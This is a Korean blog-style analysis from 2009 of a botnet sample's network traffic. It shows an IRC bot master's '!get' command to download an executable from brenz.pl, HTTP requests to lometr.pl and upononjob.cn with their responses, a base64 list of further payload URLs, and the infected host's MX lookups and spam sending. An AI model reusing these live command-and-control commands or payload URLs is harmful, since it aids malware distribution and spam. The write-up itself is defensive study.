해당 악성코드를 실행하면 proxima.ircgalaxy.pl로 접속합니다.
IRC 서버로 유명한 녀석이죠..
재수 좋았던건지는 모르겠지만 봇 마스터를 다른 사이트에서 파일을 다운로드하라고 명령을 내리더군요
|
NICK kwfqkmyt
USER d020501 . . :_Service Pack 3 JOIN &virtu :u. PRIVMSG kwfqkmyt :!get http://brenz.pl/ex/a.php |
다운로드하는 파일은 exe 파일이었습니다.
그리고 나서 lometr.pl에 접속해서 /mega/lgate.php?n=5B3590E0FB840577 를 요청하고 brenz.pl에서 /dll/abb.txt 파일과 /met/ge.txt 파일을 다운로드하였습니다.
lometr.pl에 요청한 파일에 대한 결과는 암호화된 내용이라 어떤 내용인지 확인을 하지 못했습니다.
|
GET /mega/lgate.php?n=5B3590E0FB840577 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: lometr.pl
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Jun 2009 01:39:18 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Content-Length: 80
MSBodHRwOi8vYnJlbnoucGwvZGxsL2FiYi50eHQgMSBodHRwOi8vYnJlbnoucGwvbWV0L2dlLnR4dCAx
|
추가적으로 www.upononjob.cn에서 특정 파일에 접근하고 나서 또 다른 도메인으로 리다이렉션되고 있었습니다.
|
GET /in.cgi?0032 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: www.upononjob.cn
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 19 Jun 2009 01:39:29 GMT
Content-Type: text/html
Connection: close
Set-Cookie: SL_0032_0000=_1_; domain=www.upononjob.cn; path=/; expires=Sun, 19-Jul-2009 01:39:28 GMT
Set-Cookie: TSUSER=0032; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=www.upononjob.cn
Location: http://horobl.cn/index.html
<html>
<head> <meta http-equiv="REFRESH" content="1; URL='http://horobl.cn/index.html'"> </head> <body> document moved <a href="http://horobl.cn/index.html">here</a> </body> </html> |
보시는 것과 같이 horobl.cn으로 리다이렉션되는데 연결도 안되고 DNS에서 쿼리를 날려봐도 IP가 나오지 않았습니다.
악성코드 제작자가 실수한걸까요? ㅋ
이렇게 몇개의 도메인에 접속하고 파일 받고 하는 과정에서 몇개의 IP와도 특정 데이터를 송수신하고 있었는데 모두 암호화되어 있어서 확인을 못했습니다.
그리고 이후에는 루트 네임서버로 hotmail.com, gmail.com, web.de, aol.com, yahoo.com의 MX 레코드를 질의하더니 조금 후에는 랜덤한 DNS로 랜덤한 도메인에 대한 MX 레코드값을 질의하고 있었습니다.
질의 후에는 메일서버를 통해 스팸메일로 보이는 메일을 다량으로 보내고 있었습니다.
추가 도메인에서 받은 파일은 내일 분석해볼 생각입니다. ^^
